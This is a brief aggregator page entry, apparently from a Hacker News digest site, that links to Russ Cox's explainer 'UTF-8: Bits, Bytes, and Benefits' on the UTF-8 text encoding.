An ex­cel­lent ex­plainer by Russ Cox: UTF-8: Bits, Bytes, and Benefits

...

Read the original on iamvishnu.com »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.